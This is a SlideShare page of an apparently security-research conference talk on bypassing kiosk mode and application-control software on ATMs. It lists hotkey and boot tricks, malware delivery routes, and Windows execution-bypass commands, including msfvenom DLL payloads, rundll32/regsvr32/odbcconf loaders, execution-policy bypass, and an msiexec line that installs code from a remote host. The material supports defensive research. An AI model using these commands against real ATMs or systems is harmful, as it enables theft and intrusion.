SlideShare a Scribd company logo
1 of 63
Заголовок
ptsecurity.com
Launch Impossible
Current State of Application Control Bypasses
on ATMs.
Tim Yunusov
Yar Babin
Заголовокwhoami
Appsec/websec/banksec goons
ATM enthusiasts
ЗаголовокATM security assessment
ЗаголовокATM security assessment
ЗаголовокApplication control bypass
1. Kiosk bypass techniques
2. Delivery
3. Application control software bypass
ЗаголовокKiosk mode bypass
Kiosk mode bypass
Windows XP/7
ЗаголовокKiosk mode bypass
•Safe mode
•Hotkeys
•Windows Plug&Play
•Race condition
•Booting process
ЗаголовокSafe mode
•F8 + Safe mode with command line
•DS restore mode
•AC/DC fun
ЗаголовокHotkeys
•Win+R
ЗаголовокHotkeys
•Win+R
•Alt+Tab
•Alt+F4
•Alt+Shift+ESC
•F1-F12
•Shift x5 (Windows 7 only)
•Win+(etc)
http://www.techrepublic.com/blog/windows-and-office/the-
complete-list-of-windows-logo-keyboard-shortcuts/
ЗаголовокAlwaysOnTop
This ATM is Out Of Service,
Sorry for inconvenience
ЗаголовокAlwaysOnTop
• Disabling mouse icon
• AlwaysOnTop
This ATM is Out Of Service,
Sorry for inconvenience
ЗаголовокP&P
ЗаголовокP&P
ЗаголовокBooting process
•BIOS pwd
•Network load
•Safe mode
•Physical access
•OS access
• Same passwords story
•Bootkit
• Software skimming
ЗаголовокLogical vulns
• Security tools runs from regedit/autorun
• Shift x5
• Win+U
• Ctrl+C
ЗаголовокLogical vulns
ЗаголовокEnd of the story
ЗаголовокDelivery
How to deliver malware
ЗаголовокNetwork
+ Firewall
VPN
TLS
MAC
• OS services
• Software services (Solidcore, UPDD, etc)
• Processing
• Track2
• Processing
• Track2
• Processing
ЗаголовокNetwork vulns
• VPN disabling
• Logical vulns part
• TLS disabling
• MAC disabling
• Files/registry manipulations
ЗаголовокNetwork/Hardware layer
•3G industrial modem
• Long story short
http://blog.ptsecurity.com/2015/12/critical-
vulnerabilities-in-3g4g-modems.html
•Security measures
• VPN channel
• Private APN
•Result
• ATM network infection
• Processing access
ЗаголовокNetwork/Hardware layer
•Access to *:80
•Auth bypass
•Physical access
•Proper VPN protocols(((
ЗаголовокLogical vulns
• VPN disabling
ЗаголовокLogical vulns
• FS access is strictly prohibited
ЗаголовокLogical vulns
• FTP is strictly prohibited!
ЗаголовокPrivilege escalation techniques
•FS restrictions
•Local Security Policy restrictions
ЗаголовокPrivilege escalation techniques
•Arbitrary command execute - XFS API X
•Command execute - priv escalation X
•Write files/registry - modify sec configs -
•Read files - *** -
ЗаголовокDevice mgmt
•Network card
• fw bypass
• plug&play
•USB drive
• local access to Exe file content
• plug&play
•MS13-081
•Keyboard/mouse (Teensy)
ЗаголовокOS methods to delivery
•USB Flash
•SMB
•Telnet
•HTTP (bitsadmin/IE)
•FTP (tftp, ftp, ftp в farmanager)
•DNS (TXT)
•HID emulating
ЗаголовокKeyboard
•Hotkeys:
• F1-F12
• L/R CTRL, SHIFT, ALT, WIN, TAB, ESC
ЗаголовокKeyboard
•Hotkeys:
• F1-F12
• L/R CTRL, SHIFT, ALT, WIN, TAB, ESC
• F13-F24
• Media keys (vol up/down, play, etc)
• Functional keys (start calc, IE, explorer)
ЗаголовокKeyboard keys fuzzing
•Teensy
•Digispark
•Arduino leonardo
ЗаголовокKeyboard keys fuzzing (Arduino IDE)
ЗаголовокPlug&Play
•Network devices
•Media devices (webcams, music, etc)
ЗаголовокPlug&Play devices fuzzing?
•Facedancer
ЗаголовокApp control software bypass
Story so far…
• https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html
• https://cansecwest.com/slides/2016/CSW2016_Freingruber_Bypassi
ng_Application_Whitelisting.pdf
ЗаголовокTypical verification methods
•Whitelist of dirs (c:windowssystem32, etc)
•Whitelist of files (c:windowssystem32calc.exe,
ipconfig.exe, etc)
•Hash comparing (usually SHA-256)
•Application sing (MS, Adobe, etc)
•Extensions blacklist
ЗаголовокBypassing methods
•Code execution in trusted apps (cmd, powershell)
•Hash collisions
•Bypassing extensions blacklist
•Another trusted applications (.NET, Java, PHP,
etc)
•Misconfiguration (DLL)
•Exploits
ЗаголовокFuzzing trusted apps
• for /f %%i in (C:commands.txt) do cmd /C %%i /? >> log.txt
> more commands.txt:
ATIEVXX.EXE
ATMADM.EXE
ATTRIB.EXE
….
WUAUCLT.EXE
WUPDMGR.EXE
XCOPY.EXE
ЗаголовокKnown methods
msfvenom -p windows/exec CMD=calc -f dll -o
/tmp/xek.dll
•rundll32 C:xek.dll,@DllMain
•regsvr32 /s /u xek.dll (call DllUnregisterServer)
•DLL hijacking
ЗаголовокFind some new
msfvenom -p windows/exec CMD=calc -f dll -o
/tmp/xek.dll
•rundll32 C:xek.dll,@DllMain
•regsvr32 /s /u xek.dll (call DllUnregisterServer)
•DLL hijacking
•rasautou -d C:xek.dll -p @DllMain12 -e 1
•odbcconf /a {REGSVR "C:xek.dll"}
ЗаголовокTricks from 2000
•debug.exe C:xek.com (run in memory)
•ntsd.exe C:xek.exe
•forcedos.exe C:xek.com
ЗаголовокNTSD backdoor
C:>ntsd calc.exe
0:000> .shell
ЗаголовокIf cmd disabled (packager util)
ЗаголовокExecutable extensions (its no all)
•bat, cmd
•com, exe, scr
•msp, msi, mst
•dll, cpl, sys
•hta, js, jse, vbe, vbs, vb, wsf, wsh, sct
ЗаголовокExecutable extensions (its no all)
•bat, cmd
•com, exe, scr
•msp, msi, mst
•dll, cpl, sys
•hta, js, jse, vbe, vbs, vb, wsf, wsh, sct
boring
ЗаголовокExecutable ext
A .pif file is used to start a program written for MS-DOS within
Windows, and can also be used to configure a unique environment for
individual MS-DOS-based program that run in MS-DOS mode.
PE without PE headers
C:>copy xek.exe xek.pif
C:>start xek.pif
Hello World!
ЗаголовокExecutable ext?
C:>copy xek.exe xek.supersecrethackerextension
C:>start xek.supersecrethackerextension
ЗаголовокExecutable ext
C:>copy xek.exe xek.supersecrethackerextension
C:>start xek.supersecrethackerextension
Hello World!
• App without GUI
• https://superuser.com/questions/619921/how-to-run-an-executable-
file-without-exe-extension-using-cmd-script
ЗаголовокIDDQD (16bit apps)
•R/W files
•Works with Windows registry
•Calling 32bit functions with FreeLibrary32W
•But it have more constraints 
ЗаголовокIDDQD (powershell)
•DLL Injection
•Reflective PE Injection
•https://github.com/PowerShellMafia/PowerSploit/t
ree/master/CodeExecution
ЗаголовокPowershell >WIN8
•Powershell –exec bypass –nop
ЗаголовокPowershell >WIN8
•Powershell –exec bypass –nop
•Powershell –Version 2 –exec bypass -nop
ЗаголовокAnother trusted apps (.NET)
• MsiExec /i http://xek.ru/test.png /q
• InstallUtil.exe
1. csc.exe /out:exeshell.exe exeshell.cs
2. InstallUtil.exe /logfile= /LogToConsole=false /U
exeshell.exe
• regsvcs.exe xek.dll
• http://www.blackhillsinfosec.com/?p=5257
• Exec in memory
(https://stackoverflow.com/questions/3553875/load-an-
exe-file-and-run-it-from-memory)
ЗаголовокAnother trusted apps (Java)
•System.load("C:/xek.dll");
•Runtime.getRuntime().exec("calc.exe");
•Execution in memory
(https://www.lexsi.com/securityhub/java-native-
code-injection-2)
ЗаголовокSecurity software bypass
ЗаголовокApplication control under attack
• No local exploits
• HTTP updates
• No signatures or bad signatures
• Security race condition
• Hash(loooooooong file)
• exploit.exe at the same time
• BOF
https://www.ptsecurity.com/ww-en/about/news/131496/
https://www.ptsecurity.com/ww-en/about/news/240117/
https://www.ptsecurity.com/ww-en/about/news/283971/
ЗаголовокSolutions?
Blackbox is (almost)
dead (for researchers)
Have strong
crypto btw
dispenser and
OS?
BB is not
possible
BB is
possible
Yes
ЗаголовокSolutions
ЗаголовокGreetz
• Anon guy ;-)
• Positive Technologies researchers teams:
• ICS/SCADA
• Reverse Engineering
ЗаголовокContacts
https://uk.linkedin.com/in/tyunusov
https://ru.linkedin.com/in/yarbabin
tyunusov@ptsecurity.com
ybabin@ptsecurity.com
@a66at
@yarbabin
Заголовок
Thank You!
ptsecurity.com

More Related Content

What's hot

Noseevich, petukhov no locked doors no windows barred. hacking open am infr...
Noseevich, petukhov   no locked doors no windows barred. hacking open am infr...Noseevich, petukhov   no locked doors no windows barred. hacking open am infr...
Noseevich, petukhov no locked doors no windows barred. hacking open am infr...
DefconRussia
 
Delivering a secure and fast boot experience with uefi
Delivering a secure and fast boot experience with uefiDelivering a secure and fast boot experience with uefi
Delivering a secure and fast boot experience with uefi
Norman Mayes
 

What's hot (19)

44CON 2014 - Breaking AV Software
44CON 2014 - Breaking AV Software44CON 2014 - Breaking AV Software
44CON 2014 - Breaking AV Software
 
ChromePad - Chromium OS ThinkPad X220
ChromePad - Chromium OS ThinkPad X220ChromePad - Chromium OS ThinkPad X220
ChromePad - Chromium OS ThinkPad X220
 
ChromePad - Chromium OS for ThinkPad
ChromePad - Chromium OS for ThinkPadChromePad - Chromium OS for ThinkPad
ChromePad - Chromium OS for ThinkPad
 
Veriton m200 g41
Veriton m200 g41Veriton m200 g41
Veriton m200 g41
 
Fuzzy Feelings for Fuzzy Matching
Fuzzy Feelings for Fuzzy MatchingFuzzy Feelings for Fuzzy Matching
Fuzzy Feelings for Fuzzy Matching
 
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
 
Is there an EFI monster inside your apple? by Pedro Vilaça - CODE BLUE 2015
Is there an EFI monster inside your apple? by Pedro Vilaça - CODE BLUE 2015Is there an EFI monster inside your apple? by Pedro Vilaça - CODE BLUE 2015
Is there an EFI monster inside your apple? by Pedro Vilaça - CODE BLUE 2015
 
Noseevich, petukhov no locked doors no windows barred. hacking open am infr...
Noseevich, petukhov   no locked doors no windows barred. hacking open am infr...Noseevich, petukhov   no locked doors no windows barred. hacking open am infr...
Noseevich, petukhov no locked doors no windows barred. hacking open am infr...
 
Netbook 的火狐體驗
Netbook 的火狐體驗Netbook 的火狐體驗
Netbook 的火狐體驗
 
Delivering a secure and fast boot experience with uefi
Delivering a secure and fast boot experience with uefiDelivering a secure and fast boot experience with uefi
Delivering a secure and fast boot experience with uefi
 
JS Fest 2019. Sebastian Golasch. The Universal Serial Web
JS Fest 2019. Sebastian Golasch. The Universal Serial WebJS Fest 2019. Sebastian Golasch. The Universal Serial Web
JS Fest 2019. Sebastian Golasch. The Universal Serial Web
 
firmware hacking, slash the pineapple for fun (codebali 2015)
firmware hacking, slash the pineapple for fun (codebali 2015)firmware hacking, slash the pineapple for fun (codebali 2015)
firmware hacking, slash the pineapple for fun (codebali 2015)
 
Boot process: BIOS vs UEFI
Boot process: BIOS vs UEFIBoot process: BIOS vs UEFI
Boot process: BIOS vs UEFI
 
BAD USB 2.0
BAD USB 2.0BAD USB 2.0
BAD USB 2.0
 
Lange
LangeLange
Lange
 
Linux
LinuxLinux
Linux
 
Windows 98 vs Windows 200
Windows 98 vs Windows 200Windows 98 vs Windows 200
Windows 98 vs Windows 200
 
Computer Package
Computer PackageComputer Package
Computer Package
 
Internet of Thing, is there a place for C# and .NET Framework?
Internet of Thing, is there a place for C# and .NET Framework?Internet of Thing, is there a place for C# and .NET Framework?
Internet of Thing, is there a place for C# and .NET Framework?
 

Similar to Тимур Юнусов (Россия), Positive Technologies. Уязвимости банкоматов

Deploying PHP on PaaS: Why and How?
Deploying PHP on PaaS: Why and How?Deploying PHP on PaaS: Why and How?
Deploying PHP on PaaS: Why and How?
Docker, Inc.
 
Yunusov babin 7 sins pres atm v2
Yunusov babin 7 sins pres atm v2Yunusov babin 7 sins pres atm v2
Yunusov babin 7 sins pres atm v2
PacSecJP
 
Jonny_Martin-Asterisk
Jonny_Martin-AsteriskJonny_Martin-Asterisk
Jonny_Martin-Asterisk
tutorialsruby
 
Jonny_Martin-Asterisk
Jonny_Martin-AsteriskJonny_Martin-Asterisk
Jonny_Martin-Asterisk
tutorialsruby
 
Jonny_Martin-Asterisk
Jonny_Martin-AsteriskJonny_Martin-Asterisk
Jonny_Martin-Asterisk
tutorialsruby
 
Jonny_Martin-Asterisk
Jonny_Martin-AsteriskJonny_Martin-Asterisk
Jonny_Martin-Asterisk
tutorialsruby
 

Similar to Тимур Юнусов (Россия), Positive Technologies. Уязвимости банкоматов (20)

Reverse Engineering the TomTom Runner pt. 1
Reverse Engineering the TomTom Runner pt. 1 Reverse Engineering the TomTom Runner pt. 1
Reverse Engineering the TomTom Runner pt. 1
 
Debugging webOS applications
Debugging webOS applicationsDebugging webOS applications
Debugging webOS applications
 
IT Automation with Ansible
IT Automation with AnsibleIT Automation with Ansible
IT Automation with Ansible
 
Small Screen Development
Small Screen DevelopmentSmall Screen Development
Small Screen Development
 
Getting started with SIP Express Media Server SIP app server and SBC - workshop
Getting started with SIP Express Media Server SIP app server and SBC - workshopGetting started with SIP Express Media Server SIP app server and SBC - workshop
Getting started with SIP Express Media Server SIP app server and SBC - workshop
 
Mozilla chirimen firefox os dwika v5
Mozilla chirimen firefox os dwika v5Mozilla chirimen firefox os dwika v5
Mozilla chirimen firefox os dwika v5
 
Deploying PHP on PaaS: Why and How?
Deploying PHP on PaaS: Why and How?Deploying PHP on PaaS: Why and How?
Deploying PHP on PaaS: Why and How?
 
Yunusov babin 7 sins pres atm v2
Yunusov babin 7 sins pres atm v2Yunusov babin 7 sins pres atm v2
Yunusov babin 7 sins pres atm v2
 
Advanced Windows Exploitation
Advanced Windows ExploitationAdvanced Windows Exploitation
Advanced Windows Exploitation
 
Introduction to Modern U-Boot
Introduction to Modern U-BootIntroduction to Modern U-Boot
Introduction to Modern U-Boot
 
WinFE: The (Almost) Perfect Triage Tool
WinFE: The (Almost) Perfect Triage ToolWinFE: The (Almost) Perfect Triage Tool
WinFE: The (Almost) Perfect Triage Tool
 
Jonny_Martin-Asterisk
Jonny_Martin-AsteriskJonny_Martin-Asterisk
Jonny_Martin-Asterisk
 
Jonny_Martin-Asterisk
Jonny_Martin-AsteriskJonny_Martin-Asterisk
Jonny_Martin-Asterisk
 
Jonny_Martin-Asterisk
Jonny_Martin-AsteriskJonny_Martin-Asterisk
Jonny_Martin-Asterisk
 
Jonny_Martin-Asterisk
Jonny_Martin-AsteriskJonny_Martin-Asterisk
Jonny_Martin-Asterisk
 
Ultimate Unix Meetup Presentation
Ultimate Unix Meetup PresentationUltimate Unix Meetup Presentation
Ultimate Unix Meetup Presentation
 
MateriApps LIVE! の設定
MateriApps LIVE! の設定MateriApps LIVE! の設定
MateriApps LIVE! の設定
 
x86
x86x86
x86
 
Presentation on Computer Peripheral by Atharva Jawalkar
Presentation on Computer Peripheral by Atharva JawalkarPresentation on Computer Peripheral by Atharva Jawalkar
Presentation on Computer Peripheral by Atharva Jawalkar
 
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
 

More from KazHackStan

More from KazHackStan (20)

Андрей Масалович (Россия). Корпоративная защита в РК глазами хакера
Андрей Масалович (Россия). Корпоративная защита в РК глазами хакераАндрей Масалович (Россия). Корпоративная защита в РК глазами хакера
Андрей Масалович (Россия). Корпоративная защита в РК глазами хакера
 
Евгений Гончаров (Россия, Казахстан). Автоматизация рутины AD
Евгений Гончаров (Россия, Казахстан). Автоматизация рутины ADЕвгений Гончаров (Россия, Казахстан). Автоматизация рутины AD
Евгений Гончаров (Россия, Казахстан). Автоматизация рутины AD
 
Иван Чалыкин (Россия), Digital Security. Легальный SOP Bypass. Проблемы внедр...
Иван Чалыкин (Россия), Digital Security. Легальный SOP Bypass. Проблемы внедр...Иван Чалыкин (Россия), Digital Security. Легальный SOP Bypass. Проблемы внедр...
Иван Чалыкин (Россия), Digital Security. Легальный SOP Bypass. Проблемы внедр...
 
Антон Bo0oM Лопаницын (Россия), OnSec. Трекинг. Как узнать посетителя, если о...
Антон Bo0oM Лопаницын (Россия), OnSec. Трекинг. Как узнать посетителя, если о...Антон Bo0oM Лопаницын (Россия), OnSec. Трекинг. Как узнать посетителя, если о...
Антон Bo0oM Лопаницын (Россия), OnSec. Трекинг. Как узнать посетителя, если о...
 
Омар Ганиев (Россия). Обзор атак на модели машинного обучения
Омар Ганиев (Россия). Обзор атак на модели машинного обученияОмар Ганиев (Россия). Обзор атак на модели машинного обучения
Омар Ганиев (Россия). Обзор атак на модели машинного обучения
 
Валерий Блонский (Казахстан), PACIFICA. Как угнать Ботнет
Валерий Блонский (Казахстан), PACIFICA. Как угнать БотнетВалерий Блонский (Казахстан), PACIFICA. Как угнать Ботнет
Валерий Блонский (Казахстан), PACIFICA. Как угнать Ботнет
 
Татьяна Новикова (Казахстан), ЦАРКА. Как мы мониторим Казнет с помощью WebTotem
Татьяна Новикова (Казахстан), ЦАРКА. Как мы мониторим Казнет с помощью WebTotemТатьяна Новикова (Казахстан), ЦАРКА. Как мы мониторим Казнет с помощью WebTotem
Татьяна Новикова (Казахстан), ЦАРКА. Как мы мониторим Казнет с помощью WebTotem
 
Шамбулов У. К. (Казахстан), ГТС. Анализ и исследование инцидентов информацион...
Шамбулов У. К. (Казахстан), ГТС. Анализ и исследование инцидентов информацион...Шамбулов У. К. (Казахстан), ГТС. Анализ и исследование инцидентов информацион...
Шамбулов У. К. (Казахстан), ГТС. Анализ и исследование инцидентов информацион...
 
Ярослав Бабин (Россия), Positive Technologies. Основные аспекты при проведени...
Ярослав Бабин (Россия), Positive Technologies. Основные аспекты при проведени...Ярослав Бабин (Россия), Positive Technologies. Основные аспекты при проведени...
Ярослав Бабин (Россия), Positive Technologies. Основные аспекты при проведени...
 
Виталий Трахтенберг (Израиль), MER Group. Кейс по кибер-расследованию для одн...
Виталий Трахтенберг (Израиль), MER Group. Кейс по кибер-расследованию для одн...Виталий Трахтенберг (Израиль), MER Group. Кейс по кибер-расследованию для одн...
Виталий Трахтенберг (Израиль), MER Group. Кейс по кибер-расследованию для одн...
 
Валерий Боронин (Россия), Positive Technologies. SSDL для руководителей: как ...
Валерий Боронин (Россия), Positive Technologies. SSDL для руководителей: как ...Валерий Боронин (Россия), Positive Technologies. SSDL для руководителей: как ...
Валерий Боронин (Россия), Positive Technologies. SSDL для руководителей: как ...
 
Батыржан Тютеев (Казахстан), ЦАРКА. Уязвимости Казнета
Батыржан Тютеев (Казахстан), ЦАРКА. Уязвимости КазнетаБатыржан Тютеев (Казахстан), ЦАРКА. Уязвимости Казнета
Батыржан Тютеев (Казахстан), ЦАРКА. Уязвимости Казнета
 
Сергей Белов (Россия), Mail.ru. Temple of Bug Bounty: Leveling & Farming
Сергей Белов (Россия), Mail.ru. Temple of Bug Bounty: Leveling & FarmingСергей Белов (Россия), Mail.ru. Temple of Bug Bounty: Leveling & Farming
Сергей Белов (Россия), Mail.ru. Temple of Bug Bounty: Leveling & Farming
 
Максим Ефименко (Казахстан), ЦАРКА. Двойное проникновение
Максим Ефименко (Казахстан), ЦАРКА. Двойное проникновениеМаксим Ефименко (Казахстан), ЦАРКА. Двойное проникновение
Максим Ефименко (Казахстан), ЦАРКА. Двойное проникновение
 
Сергей Харюк (Украина). Проверка безопасности приложений на платформе iOS
Сергей Харюк (Украина). Проверка безопасности приложений на платформе iOSСергей Харюк (Украина). Проверка безопасности приложений на платформе iOS
Сергей Харюк (Украина). Проверка безопасности приложений на платформе iOS
 
Андрей Абакумов (Россия). Yandex.ru. Соавтор: Эльдар Заитов. Автоматизация ск...
Андрей Абакумов (Россия). Yandex.ru. Соавтор: Эльдар Заитов. Автоматизация ск...Андрей Абакумов (Россия). Yandex.ru. Соавтор: Эльдар Заитов. Автоматизация ск...
Андрей Абакумов (Россия). Yandex.ru. Соавтор: Эльдар Заитов. Автоматизация ск...
 
Ярослав Бабин (Россия), Positive Technologies. Основные аспекты при проведени...
Ярослав Бабин (Россия), Positive Technologies. Основные аспекты при проведени...Ярослав Бабин (Россия), Positive Technologies. Основные аспекты при проведени...
Ярослав Бабин (Россия), Positive Technologies. Основные аспекты при проведени...
 
Ильяс Аринов (Казахстан), ЦАРКА. Linux for newbie hackers
Ильяс Аринов (Казахстан), ЦАРКА. Linux for newbie hackersИльяс Аринов (Казахстан), ЦАРКА. Linux for newbie hackers
Ильяс Аринов (Казахстан), ЦАРКА. Linux for newbie hackers
 
Презентация НИТ
Презентация НИТПрезентация НИТ
Презентация НИТ
 
Дмитрий Кузнецов. Опыт РФ в обеспечении национальной кибербезопасности
Дмитрий Кузнецов. Опыт РФ в обеспечении национальной кибербезопасностиДмитрий Кузнецов. Опыт РФ в обеспечении национальной кибербезопасности
Дмитрий Кузнецов. Опыт РФ в обеспечении национальной кибербезопасности
 

Recently uploaded

EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Earley Information Science
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
giselly40
 

Recently uploaded (20)

Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 

Тимур Юнусов (Россия), Positive Technologies. Уязвимости банкоматов